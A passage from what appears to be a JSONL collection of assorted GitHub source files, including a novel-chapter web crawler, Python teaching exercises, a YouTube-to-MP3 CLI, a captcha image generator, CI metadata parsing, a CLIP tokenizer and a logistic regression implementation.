get_catalogue_url_list(catalogue_url, content, catalogue_selector)\n\n remove_title(novel_title + web_name)\n\n loop_num = 100\n for i in range(len(url_list[start_num:]) // loop_num + 1):\n async with asyncio.TaskGroup() as tg:\n tasks_list = [\n tg.create_task(get_page_content(context, novel_url))\n for novel_url in url_list[start_num + i * loop_num: start_num + (i + 1) * loop_num]\n ]\n print(\"开始爬取小说内容\")\n\n print(f\"爬取成功 {loop_num} 章, 正在写入文件\")\n for task in tasks_list:\n get_novel_content(task.result(), novel_title, novel_selector)\n await asyncio.sleep(5.0)\n\n await browser.close()\n await p.stop()\n print(\"无头浏览器已关闭\")\n\n\nif __name__ == \"__main__\":\n catalogue_url = input(\"请输入小说目录的url:\") or \"https://www.biququ.info/html/61746/\"\n start_num = input(\"从第几章开始爬取(直接回车默认从头开始):\")\n if start_num.isdigit():\n start_num = int(start_num)\n else:\n start_num = 0\n web_name = \"_\" + parse.urlparse(catalogue_url).netloc.split(\".\")[-2]\n catalogue_selector = input(\"catalogue_selector:(直接回车默认为div#list dd)\") or \"div#list dd\"\n novel_selector = input(\"novel_selector:(直接回车默认为div#content)\") or \"div#content\"\n asyncio.run(main(catalogue_url, start_num, catalogue_selector, novel_selector))\n input(\"\\n\\n爬取成功结束, 回车退出\")\n","repo_name":"boxie123/NovelCrawl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16943802864","text":"''' metody klas, jak definiować metody klas\r\nsą to funkcje które można wywoływać z poziomu klasy. 
they can apply to the class itself or to individual instances '''\r\n\r\nclass Zwierz:\r\n # below is the class definition\r\n # class description\r\n '''first class'''\r\n # we define a class method, i.e. a function inside the class\r\n #rodzaj # we define attributes whose values will be shared by all objects of the class\r\n rodzaj = \"animal\" # to do this we write the attribute name inside the class definition, omitting \"self\"\r\n zwierzeta = {}\t\t\t\t\t#new variable - a dictionary whose keys are animal names and whose values are counts\r\n\r\n def __init__(self, gatunek, wiek, predkosc): #after self we list the arguments passed when creating class instances\r\n self.gatunek = gatunek #we set the attributes when the class is initialized\r\n self.wiek = wiek\r\n self.max_predkosc = predkosc\t\t\t#another attribute needed in a method\r\n if gatunek in Zwierz.zwierzeta:\t\t\t#if the species is already in the zwierzeta dictionary\r\n Zwierz.zwierzeta[gatunek]+= 1\t\t# then add 1 to the value stored under that species, increasing the animal count in our zoo\r\n else:\t\t\t\t\t\t\t\t\t# otherwise create a new dictionary entry for that species and set its count to 1\r\n Zwierz.zwierzeta[gatunek] = 1\r\n def oblicz_odleglosc(self, czas):\t\t\t#methods available (called) from an instance should take the self argument\r\n print(czas * self.max_predkosc)\r\n def wypisz_zwierzeta():\t\t\t\t#another class-level method (without self) that prints the counts\r\n print(Zwierz.zwierzeta)\r\n# a special class method called by python when built-in functions such as print are invoked\r\n def __str__(self):\r\n return self.gatunek\\\r\n\t\t\t + \" is \" + str(self.wiek)\\\r\n\t\t\t + \" year(s) old and reaches a speed of \"\\\r\n\t\t\t + str(self.max_predkosc) + \" km/h\"\r\n#str() around wiek and max_predkosc above because they are integers\r\n\r\nZwierz.wypisz_zwierzeta()\t\t#checking the dictionary contents before declaring any objects {}\r\na = Zwierz(\"fox\", 5, 10)\r\nb = Zwierz(\"python\", 2, 5)\r\nc = Zwierz(\"fox\", 3, 10)\r\nZwierz.wypisz_zwierzeta()\t\t# {'fox': 2, 'python': 1} we have 2 objects of species fox - check after declaration\r\na.oblicz_odleglosc(2)\r\nb.oblicz_odleglosc(2)\r\n\r\n#we can define methods at the class level - this applies to 
zwierzeta\r\na = Zwierz(\"fox\", 3 , 10)\t\t#we define a class instance\r\nprint(a)\t\t\t\t\t#without def __str__: <__main__.Zwierz object at 0x0000021ED8DD6278> - a string describing the object's type\r\n\t\t\t\t\t\t\t# with def __str__: fox is 3 year(s) old and reaches a speed of 10 km/h","repo_name":"wojtekkrupa/REP","sub_path":"Kurs1_podstawy/metody klas.py","file_name":"metody klas.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27627608617","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task(delay=0.05)\ndef task_4_11():\n row_number = 13\n column_pairs = 7\n for num, column in enumerate(range(column_pairs)):\n move_right()\n for row in range(row_number):\n move_down()\n fill_cell()\n if num < len(range(column_pairs)) - 1:\n row_number -= 2\n move_right()\n fill_cell()\n for row in range(row_number):\n move_up()\n fill_cell()\n move_down()\n move_left(12)\n\n\nif __name__ == '__main__':\n run_tasks()\n","repo_name":"AndreyAD1/mipt_course","sub_path":"lesson2/robot-tasks-master/task_21.py","file_name":"task_21.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26372521909","text":"# error handling\n\n# nb = input('prime number')\n\n# try:\n# nb = int(nb)\n# except:\n# print('the age is not valid')\n# else:\n# print(f\"the number is {nb}\")\n# finally:\n# print('End of program')\n\n\nnb1 = 150\nnb2 = input('number to divide')\n\ntry:\n nb2 = int(nb2)\n print(f'Result = {nb1 / nb2}')\nexcept ZeroDivisionError:\n print(\"You cannot divide by 0\")\n\nexcept ValueError:\n print(\"you must enter a number.\")\n\nexcept:\n print(\"invalid value\")\n\nelse:\n print(\"Well done, you entered a valid number\")\nfinally:\n print(\"End of program\")\n\n\n\n#creating our own error with raise\n\n\n\n#assert error\n\n","repo_name":"Misteur54/ifa-python","sub_path":"Jour3/ex00/demo_ifa_err.py","file_name":"demo_ifa_err.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4111822408","text":"from os import getcwd\n\nfrom typer import Argument, Option, Exit\nfrom typing_extensions import Annotated\n\nfrom rich import print as rprint\n\nfrom download import download_playlist, download_video\n\n__app_name__ = 'YouTube to MP3 CLI'\n__version__ = '0.0.1'\n\n\ndef _version_callback(value: bool):\n if value:\n rprint(f'{__app_name__} [bold green]v{__version__}[/bold green]')\n raise Exit()\n\n\ndef main(\n url: Annotated[str, Argument(help='YouTube video or playlist URL', show_default=False)],\n output: Annotated[str, Argument(help='Output directory')] = f'{getcwd()}\\\\output',\n playlist: Annotated[bool, Option('--playlist', '-p', help='Download playlist')] = False,\n version: Annotated[bool, Option('--version', '-v', help='Show version', callback=_version_callback)] = False,\n) -> None:\n \"\"\"\n Convert a YouTube video or playlist to mp3 and download it.\n \"\"\"\n download_playlist(url, output) if playlist else download_video(url, output)\n","repo_name":"DevTotoro/youtube-to-mp3-cli","sub_path":"src/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13299560449","text":"from PIL import Image\n# open a jpg image file\nim = Image.open('test.jpg')\n# collect 
image size\nw, h = im.size\nprint('Original image size: %s %s ' % (w, h))\n# scale down to 50%\nim.thumbnail((w//2, h//2))\nprint('Resize image to: %s %s' % (w//2, h//2))\n# save the resized image as jpeg\nim.save('thumbnail.jpg', 'jpeg')\n\nfrom PIL import ImageFilter # filters\n# blur it\nim2 = im.filter(ImageFilter.BLUR)\nim2.save('blur.jpg', 'jpeg')\n\n# generate a letter captcha image\n\nfrom PIL import ImageDraw, ImageFont, ImageFilter # drawing # text # filters\nimport random\n# random letter\n\n\ndef rndChar():\n return chr(random.randint(65, 90)) # ASCII codes for the letters\n# random color\n\n\ndef rndColor():\n return (random.randint(64, 255), random.randint(64, 255), random.randint(64, 255))\n# random color 2\n\n\ndef rndColor2():\n return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))\n# 240X60\nwidth = 60 * 4\nheight = 60\nimage = Image.new('RGB', (width, height), (255, 255, 255))\n# create Font object\nfont = ImageFont.truetype('c:/Windows/Fonts/Arial.ttf', 36)\n# create Draw object\ndraw = ImageDraw.Draw(image)\n# fill every pixel\nfor x in range(width):\n for y in range(height):\n draw.point((x, y), fill=rndColor())\n# output words\nfor t in range(4):\n letter = rndChar()\n print('%d: %s' % (t+1,letter))\n draw.text((60 * t + 10, 10), letter, font=font, fill=rndColor2())\n# blur\nimage = image.filter(ImageFilter.BLUR)\nimage.save('code.jpg', 'jpeg')\n","repo_name":"xiaoyaojjian/py_learn","sub_path":"曾经练习代码/pillow_test.py","file_name":"pillow_test.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"72485271847","text":"import cv2 as cv\r\nimg=cv.imread('pictures/balloon.jpg')\r\ncv.imshow('Balloon',img) #kernel size basically no. of rows and columns\r\n#AVERAGE BLUR, we take the middle pixel intensity which is the average of the pixel intensities around it\r\naverage=cv.blur(img,(7,7))#(3,3) is the kernel size\r\ncv.imshow('Average Blur',average)\r\n#GAUSSIAN BLUR, similar to average blurring but we use a weighted mean where neighbourhood pixels closer\r\n#to the central pixel contribute more weight to the average\r\ngauss=cv.GaussianBlur(img,(7,7),0) #0 is standard deviation towards x\r\ncv.imshow('GAUSSIAN blur',gauss)\r\n#MEDIAN BLUR,similar to average but instead we find the median of the surrounding pixels-better blurring than gauss and average\r\nmedian=cv.medianBlur(img,7) #we take only 3 because it is automatically assumed to be a tuple of 3,3 size\r\ncv.imshow('Median',median)\r\n#BILATERAL BLUR,blurring will take place but the edges will be retained\r\nbilateral=cv.bilateralFilter(img,10,35,25) #5 ->Diameter of each pixel neighborhood,15->SigmaColor,colors farther from each other will get mixed\r\n#15-> sigmaSpace,more distant pixels will get mixed\r\ncv.imshow('BILATERAL',bilateral)\r\ncv.waitKey(0)","repo_name":"VanshikaThapliyal/OpenCV-BasicOperations","sub_path":"smoothing.py","file_name":"smoothing.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21454515965","text":"# -*- coding: utf-8 -*-\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n Perf: Runtime: 12 ms, faster than 99.50% / Memory Usage: 11.8 MB, less than 67.82%\n T: O(n)\n S: O(n)\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n node = ListNode(None)\n head = node\n while l1 and l2:\n if l1.val < l2.val:\n 
node.next = l1\n l1 = l1.next\n else:\n node.next = l2\n l2 = l2.next\n node = node.next\n\n while l1:\n node.next = l1\n l1 = l1.next\n node = node.next\n\n while l2:\n node.next = l2\n l2 = l2.next\n node = node.next\n\n return head.next","repo_name":"jerrt2003/leetcode-in-python","sub_path":"Interview_Feedback/Cruise/21. Merge Two Sorted Lists/Scan2.py","file_name":"Scan2.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7421568750","text":"import spacy\r\nimport textacy\r\nimport textacy.resources\r\nfrom nltk.corpus import wordnet as wn\r\nfrom nltk.corpus.reader import WordNetError\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport nltk\r\nfrom textacy import utils as util_aug\r\nfrom textacy.augmentation.transforms import _select_random_candidates\r\nfrom textacy.augmentation.utils import to_aug_toks\r\nfrom textacy.augmentation.utils import AugTok\r\n\r\nwnl = WordNetLemmatizer()\r\n\r\n\r\nclass Definition:\r\n def __init__(self, docs, nlp=None):\r\n self.docs = docs\r\n self.nlp = nlp\r\n nltk.download('wordnet')\r\n nltk.download('omw-1.4')\r\n rs = textacy.resources.ConceptNet()\r\n rs.download()\r\n if not self.nlp:\r\n spacy.cli.download(\"en_core_web_lg\")\r\n self.nlp = spacy.load(\"en_core_web_lg\")\r\n\r\n def mass_definition(self):\r\n return [make_new_text(self.definition_words(doc, [\"NOUN\", \"VERB\", \"ADV\", \"ADJ\"], 0.50))\r\n for doc in self.nlp.pipe(self.docs, batch_size=500)]\r\n\r\n def definition_words(self, doc, pos, num):\r\n aug_toks = to_aug_toks(doc)\r\n pos = util_aug.to_collection(pos, str, set)\r\n cand_idxs = [\r\n idx\r\n for idx, aug_tok in enumerate(aug_toks)\r\n if aug_tok.syns and (pos is None or aug_tok.pos in pos)\r\n ]\r\n rand_idxs = set(_select_random_candidates(cand_idxs, num))\r\n if not rand_idxs:\r\n return aug_toks[:]\r\n\r\n return [AugTok(\r\n text=decide_definition(aug_tok),\r\n ws=aug_tok.ws,\r\n pos=aug_tok.pos,\r\n is_word=aug_tok.is_word,\r\n syns=aug_tok.syns,\r\n )\r\n if idx in rand_idxs\r\n else aug_tok\r\n for idx, aug_tok, in enumerate(aug_toks)\r\n ]\r\n\r\n\r\ndef definition_words(doc, pos, num):\r\n aug_toks = to_aug_toks(doc)\r\n pos = util_aug.to_collection(pos, str, set)\r\n cand_idxs = [\r\n idx\r\n for idx, aug_tok in enumerate(aug_toks)\r\n if aug_tok.syns and (pos is None or aug_tok.pos in pos)\r\n ]\r\n rand_idxs = set(_select_random_candidates(cand_idxs, num))\r\n if not rand_idxs:\r\n return aug_toks[:]\r\n\r\n return [AugTok(\r\n text=decide_definition(aug_tok),\r\n ws=aug_tok.ws,\r\n pos=aug_tok.pos,\r\n is_word=aug_tok.is_word,\r\n syns=aug_tok.syns,\r\n )\r\n if idx in rand_idxs\r\n else aug_tok\r\n for idx, aug_tok, in enumerate(aug_toks)\r\n ]\r\n\r\n\r\ndef make_new_spacy_doc(aug_toks):\r\n new_text = \"\".join(\r\n aug_tok.text + aug_tok.ws\r\n for aug_tok in aug_toks\r\n )\r\n return textacy.spacier.core.make_spacy_doc(new_text, \"en_core_web_lg\")\r\n\r\n\r\ndef make_new_text(aug_toks):\r\n return \"\".join(\r\n aug_tok.text + aug_tok.ws\r\n for aug_tok in aug_toks\r\n )\r\n\r\n\r\ndef decide_definition(aug_tok):\r\n pos_dict = {'NOUN': 'n',\r\n 'VERB': 'v',\r\n 'ADJ': 'a',\r\n 'ADV': 'r'}\r\n try:\r\n return wn.synset(wnl.lemmatize(aug_tok.text, pos=pos_dict.get(aug_tok.pos)) + \".\" + pos_dict.get(\r\n aug_tok.pos) + '.01').definition()\r\n except WordNetError:\r\n return aug_tok.text\r\n\r\n#if __name__ == \"__main__\":\r\n# 
main()\r\n","repo_name":"BaranPolat/master-thesis","sub_path":"definition.py","file_name":"definition.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19175628662","text":"import lbry.wallet\nfrom lbry.extras.daemon import analytics\n\nimport unittest\n\n\n@unittest.SkipTest\nclass TrackTest(unittest.TestCase):\n def test_empty_summarize_is_none(self):\n track = analytics.Manager(None, 'x', 'y', 'z')\n _, result = track.summarize_and_reset('a')\n self.assertIsNone(result)\n\n def test_can_get_sum_of_metric(self):\n track = analytics.Manager(None, 'x', 'y', 'z')\n track.add_observation('b', 1)\n track.add_observation('b', 2)\n\n _, result = track.summarize_and_reset('b')\n self.assertEqual(3, result)\n\n def test_summarize_resets_metric(self):\n track = analytics.Manager(None, 'x', 'y', 'z')\n track.add_observation('metric', 1)\n track.add_observation('metric', 2)\n\n track.summarize_and_reset('metric')\n _, result = track.summarize_and_reset('metric')\n self.assertIsNone(result)\n","repo_name":"lbryio/lbry-sdk","sub_path":"tests/unit/analytics/test_track.py","file_name":"test_track.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":7218,"dataset":"github-code","pt":"53"}
+{"seq_id":"71565533927","text":"import os\r\nfrom config.config import *\r\n\r\n\r\ndef del_file(datapath):\r\n train_path = ['training-a', 'training-b', 'training-c', 'training-d', 'training-e', 'training-f']\r\n val_path = 'validation'\r\n val_data = []\r\n for dataset in os.listdir(datapath):\r\n data_dir = os.path.join(datapath, dataset)\r\n for data in os.listdir(data_dir):\r\n data_path = os.path.join(data_dir, data)\r\n if os.path.isfile(data_path):\r\n if data.startswith(\".\"):\r\n os.remove(data_path)\r\n print(data + ' del done!')\r\n elif not data.endswith(\".wav\"):\r\n if data.endswith(\".csv\"):\r\n continue\r\n os.remove(data_path)\r\n print(data + ' del done!')\r\n\r\n val_data_path = os.path.join(datapath, val_path)\r\n for _data in os.listdir(val_data_path):\r\n if not _data.endswith('.csv'):\r\n val_data.append(_data)\r\n for train_dir in train_path:\r\n train_data_path = os.path.join(datapath, train_dir)\r\n for train_data in os.listdir(train_data_path):\r\n if train_data in val_data:\r\n # print(train_data)\r\n train_data = os.path.join(train_data_path, train_data)\r\n os.remove(train_data)\r\n print('Del File Done!')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n del_file(DATAPATH)\r\n","repo_name":"Darrenonly/PCG","sub_path":"del_repeat_file.py","file_name":"del_repeat_file.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"29637522816","text":"# Exercise 10.6\n# Find the sum of numbers entered from the keyboard. The number of inputs is not\n# known in advance. 
Окончание ввода, например, слово «Стоп».\ntotal = 0\nwhile True:\n n = input(\"Ведите число, если достаточно, введите стоп: \")\n if str(n) == 'стоп':\n print(\"Пока-Пока!!!\")\n break\n else:\n total = total + int(n)\n print(total)","repo_name":"vklimov1976/python","sub_path":"Task-10.6.py","file_name":"Task-10.6.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34343610571","text":"import os\n\nfrom transformers import CLIPTokenizer, CLIPTextModel, CLIPTextConfig\nimport torch\n\nclass ClipTokenWeightEncoder:\n def encode_token_weights(self, token_weight_pairs):\n z_empty = self.encode(self.empty_tokens)\n output = []\n for x in token_weight_pairs:\n tokens = [list(map(lambda a: a[0], x))]\n z = self.encode(tokens)\n for i in range(len(z)):\n for j in range(len(z[i])):\n weight = x[j][1]\n z[i][j] = (z[i][j] - z_empty[0][j]) * weight + z_empty[0][j]\n output += [z]\n if (len(output) == 0):\n return self.encode(self.empty_tokens)\n return torch.cat(output, dim=-2)\n\nclass SD1ClipModel(torch.nn.Module, ClipTokenWeightEncoder):\n \"\"\"Uses the CLIP transformer encoder for text (from huggingface)\"\"\"\n LAYERS = [\n \"last\",\n \"pooled\",\n \"hidden\"\n ]\n def __init__(self, version=\"openai/clip-vit-large-patch14\", device=\"cpu\", max_length=77,\n freeze=True, layer=\"last\", layer_idx=None, textmodel_json_config=None, textmodel_path=None): # clip-vit-base-patch32\n super().__init__()\n assert layer in self.LAYERS\n if textmodel_path is not None:\n self.transformer = CLIPTextModel.from_pretrained(textmodel_path)\n else:\n if textmodel_json_config is None:\n textmodel_json_config = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"sd1_clip_config.json\")\n config = CLIPTextConfig.from_json_file(textmodel_json_config)\n self.transformer = CLIPTextModel(config)\n\n self.device = device\n self.max_length = max_length\n if freeze:\n self.freeze()\n self.layer = layer\n self.layer_idx = None\n self.empty_tokens = [[49406] + [49407] * 76]\n if layer == \"hidden\":\n assert layer_idx is not None\n assert abs(layer_idx) <= 12\n self.clip_layer(layer_idx)\n\n def freeze(self):\n self.transformer = self.transformer.eval()\n #self.train = disabled_train\n for param in self.parameters():\n param.requires_grad = False\n\n def clip_layer(self, layer_idx):\n if abs(layer_idx) >= 12:\n self.layer = \"last\"\n else:\n self.layer = \"hidden\"\n self.layer_idx = layer_idx\n\n def forward(self, tokens):\n tokens = torch.LongTensor(tokens).to(self.device)\n outputs = self.transformer(input_ids=tokens, output_hidden_states=self.layer==\"hidden\")\n\n if self.layer == \"last\":\n z = outputs.last_hidden_state\n elif self.layer == \"pooled\":\n z = outputs.pooler_output[:, None, :]\n else:\n z = outputs.hidden_states[self.layer_idx]\n z = self.transformer.text_model.final_layer_norm(z)\n\n return z\n\n def encode(self, tokens):\n return self(tokens)\n\ndef parse_parentheses(string):\n result = []\n current_item = \"\"\n nesting_level = 0\n for char in string:\n if char == \"(\":\n if nesting_level == 0:\n if current_item:\n result.append(current_item)\n current_item = \"(\"\n else:\n current_item = \"(\"\n else:\n current_item += char\n nesting_level += 1\n elif char == \")\":\n nesting_level -= 1\n if nesting_level == 0:\n result.append(current_item + \")\")\n current_item = \"\"\n else:\n current_item += char\n else:\n current_item += char\n if current_item:\n result.append(current_item)\n 
return result\n\ndef token_weights(string, current_weight):\n a = parse_parentheses(string)\n out = []\n for x in a:\n weight = current_weight\n if len(x) >= 2 and x[-1] == ')' and x[0] == '(':\n x = x[1:-1]\n xx = x.rfind(\":\")\n weight *= 1.1\n if xx > 0:\n try:\n weight = float(x[xx+1:])\n x = x[:xx]\n except:\n pass\n out += token_weights(x, weight)\n else:\n out += [(x, current_weight)]\n return out\n\ndef escape_important(text):\n text = text.replace(\"\\\\)\", \"\\0\\1\")\n text = text.replace(\"\\\\(\", \"\\0\\2\")\n return text\n\ndef unescape_important(text):\n text = text.replace(\"\\0\\1\", \")\")\n text = text.replace(\"\\0\\2\", \"(\")\n return text\n\nclass SD1Tokenizer:\n def __init__(self, tokenizer_path=None, max_length=77, pad_with_end=True):\n if tokenizer_path is None:\n tokenizer_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"sd1_tokenizer\")\n self.tokenizer = CLIPTokenizer.from_pretrained(tokenizer_path)\n self.max_length = max_length\n empty = self.tokenizer('')[\"input_ids\"]\n self.start_token = empty[0]\n self.end_token = empty[1]\n self.pad_with_end = pad_with_end\n vocab = self.tokenizer.get_vocab()\n self.inv_vocab = {v: k for k, v in vocab.items()}\n\n def tokenize_with_weights(self, text):\n text = escape_important(text)\n parsed_weights = token_weights(text, 1.0)\n\n tokens = []\n for t in parsed_weights:\n tt = self.tokenizer(unescape_important(t[0]))[\"input_ids\"][1:-1]\n for x in tt:\n tokens += [(x, t[1])]\n\n out_tokens = []\n for x in range(0, len(tokens), self.max_length - 2):\n o_token = [(self.start_token, 1.0)] + tokens[x:min(self.max_length - 2 + x, len(tokens))]\n o_token += [(self.end_token, 1.0)]\n if self.pad_with_end:\n o_token +=[(self.end_token, 1.0)] * (self.max_length - len(o_token))\n else:\n o_token +=[(0, 1.0)] * (self.max_length - len(o_token))\n\n out_tokens += [o_token]\n\n return out_tokens\n\n def untokenize(self, token_weight_pair):\n return list(map(lambda a: (a, self.inv_vocab[a[0]]), token_weight_pair))\n","repo_name":"samuelchristlie/StellarUI","sub_path":"backend/sd1_clip.py","file_name":"sd1_clip.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27230338699","text":"import numpy as np\n\nfrom zadania import adam\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\nclass LogisticRegressionCost:\n\n def __init__(self, X, y, reg_lambda):\n self.X = X\n self.y = y\n self.reg_lambda = reg_lambda\n\n def taylor(self, x):\n # x == (w, b)\n w = x[:-1]\n b = x[-1]\n y_pred = sigmoid(np.dot(self.X, w) + b) \n dw = (np.dot(self.X.T, (y_pred - self.y)) + self.reg_lambda * w) / len(self.X)\n db = np.average(y_pred - self.y) + self.reg_lambda * b / len(self.X)\n dx = np.concatenate((dw, np.array([db])))\n return (\n 0., # dummy value, won't be needed\n dx)\n\nclass LogisticRegression:\n\n def __init__(self, X, y, reg_lambda=1., n_iter=100, tol=.0001, seed=43):\n w = np.random.RandomState(seed=seed).normal(size=(X.shape[1],))\n b = 0\n x = np.concatenate((w, np.array([b])))\n optimizer = adam(\n f=LogisticRegressionCost(X, y, reg_lambda),\n starting_point=x,\n learning_rate=.1,\n beta1=0.9,\n beta2=0.999,\n epsilon=1e-8)\n MAX_REPEATS = 43\n for _ in range(MAX_REPEATS):\n for _, (x, _, grad) in zip(range(n_iter), optimizer):\n pass\n if np.average(np.abs(grad)) < tol:\n break\n self.w = x[:-1]\n self.b = x[-1]\n \n def predict_proba(self, X):\n y_pred = sigmoid(np.dot(X, self.w) + self.b)\n return np.stack((1 - 
y_pred, y_pred), axis=1)\n\n def predict(self, X):\n return (self.predict_proba(X)[:,1].reshape(-1,1) >= .5).astype(np.uint8)\n","repo_name":"yaroslavvasko/ml2018","sub_path":"lab/zadania/rozwiazania/zadanie5.py","file_name":"zadanie5.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7163541266","text":"from ._base import DataSource\nfrom .. import const, utils\n\n\nclass AppVeyorSource(DataSource):\n name = \"appveyor\"\n priority = const.PRIORITY_SERVICE\n\n def is_active(self):\n return self.context.get_from_environ(\n \"APPVEYOR\", convert_bools=True\n ) and self.context.get_from_environ(\"CI\", convert_bools=True)\n\n def get_values(self):\n project_owner, project_name = utils.split_project_slug(\n self.context.get_from_environ(\"APPVEYOR_REPO_NAME\")\n )\n build_number = self.context.get_from_environ(\"APPVEYOR_BUILD_NUMBER\")\n job_number = self.context.get_from_environ(\"APPVEYOR_JOB_NUMBER\")\n\n build = {\n const.PROJECT_OWNER: project_owner,\n const.PROJECT_NAME: project_name,\n const.COMMIT: self.context.get_from_environ(\"APPVEYOR_REPO_COMMIT\"),\n const.BRANCH: self.context.get_from_environ(\"APPVEYOR_REPO_BRANCH\"),\n const.TAG: self.context.get_from_environ(\"APPVEYOR_REPO_TAG_NAME\"),\n const.SERVICE: \"appveyor\",\n const.BUILD_ID: \"appveyor-%s.%s\" % (build_number, job_number),\n }\n\n build_id = self.context.get_from_environ(\"APPVEYOR_BUILD_ID\")\n job_id = self.context.get_from_environ(\"APPVEYOR_JOB_ID\")\n\n # AppVeyor does this weird thing where the project owner\n # isn't necessarily the same owner as the CI project\n appveyor_account_name = self.context.get_from_environ(\"APPVEYOR_ACCOUNT_NAME\")\n appveyor_project_name = self.context.get_from_environ(\"APPVEYOR_PROJECT_NAME\")\n if appveyor_account_name and appveyor_project_name and build_id and job_id:\n build[const.URL] = (\n \"https://ci.appveyor.com/project/%s/%s/builds/%s/job/%s\"\n % (appveyor_account_name, appveyor_project_name, build_id, job_id)\n )\n\n appveyor = {\n \"repo\": {\n \"provider\": self.context.pop_from_environ(\"APPVEYOR_REPO_PROVIDER\"),\n \"scm\": self.context.pop_from_environ(\"APPVEYOR_REPO_SCM\"),\n },\n \"platform\": self.context.pop_from_environ(\"PLATFORM\"),\n \"worker_image\": self.context.pop_from_environ(\n \"APPVEYOR_BUILD_WORKER_IMAGE\"\n ),\n }\n\n pull_request_number = self.context.get_from_environ(\n \"APPVEYOR_PULL_REQUEST_NUMBER\",\n normalizer=lambda x: int(x) if x != \"false\" else None,\n )\n if pull_request_number:\n build[const.PULL_REQUEST] = pull_request_number\n\n self.context.pop_from_environ(\n [\"CI\", \"APPVEYOR\", \"CONFIGURATION\", \"PLATFORM\", \"CI_LINUX\", \"CI_WINDOWS\"]\n )\n self.context.pop_from_environ(\n [x for x in self.context.environ if x.startswith(\"APPVEYOR_\")]\n )\n\n return {\"appveyor\": appveyor, \"build\": build}\n","repo_name":"sethmlarson/delt","sub_path":"src/delt/sources/appveyor.py","file_name":"appveyor.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33353852015","text":"# coding : UTF-8\nimport towhee\nimport unittest\n\n\nclass TestDagInfo(unittest.TestCase):\n \"\"\" Test case of dag info \"\"\"\n def test_image_decode_clip_dag_information(self):\n \"\"\"\n Unittest dag info\n \"\"\"\n dc = towhee.dummy_input() \\\n .image_decode['path', 'img']() \\\n .towhee.clip['img', 'vec'](model_name='clip_vit_b32', 
modality='image', op_config={'ac':'123', 'asd':'wea'}) \\\n .as_function() \n \n a = dc.dag_info['end']['parent_ids'][0]\n b = {'model_name': 'clip_vit_b32', 'modality': 'image'}\n\n self.assertEqual(dc.dag_info[a]['init_args'] ,b)\n\n for key, val in dc.dag_info.items():\n if val['op'] == 'stream':\n self.assertEqual(val['op_name'], 'dummy_input')\n if val['parent_ids'] == []:\n self.assertEqual(key, 'start')\n\n expect = {'ac':'123', 'asd':'wea'}\n for i in dc.dag_info.values():\n if i['op_name'] == 'towhee/clip':\n self.assertEqual(i['op_config'], expect)\n else:\n self.assertEqual(i['op_config'], None)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"sitedata/towhee","sub_path":"tests/testcases/test_dag_info.py","file_name":"test_dag_info.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"11979106627","text":"from pathlib import Path\n\nimport pandas as pd\n\nfrom lakehouse_ufba.params import DuckDBFile, RawFiles\nfrom lakehouse_ufba.utils import insert_pandas_df_into_duckdb, log\n\n\ndef read_socioeconomic(file_path: str | Path) -> pd.DataFrame:\n return pd.read_spss(file_path)\n\n\ndef pre_clean_socioeconomic_df(df_socioeconomic: pd.DataFrame) -> pd.DataFrame:\n # drop \"filter_$\" column\n if \"filter_$\" in df_socioeconomic.columns:\n df_socioeconomic = df_socioeconomic.drop(columns=\"filter_$\")\n \n # all columns to lowercase\n df_socioeconomic = df_socioeconomic.rename(columns=lambda x: x.lower())\n \n # convert \"insrica\" and \"cpf\" to str\n for column in [\"inscrica\", \"cpf\"]:\n if column in df_socioeconomic.columns:\n df_socioeconomic[column] = df_socioeconomic[column].astype(str)\n \n columns_to_test_for_dups = [\"ano\", \"inscrica\", \"area\", \"curso\"]\n \n if 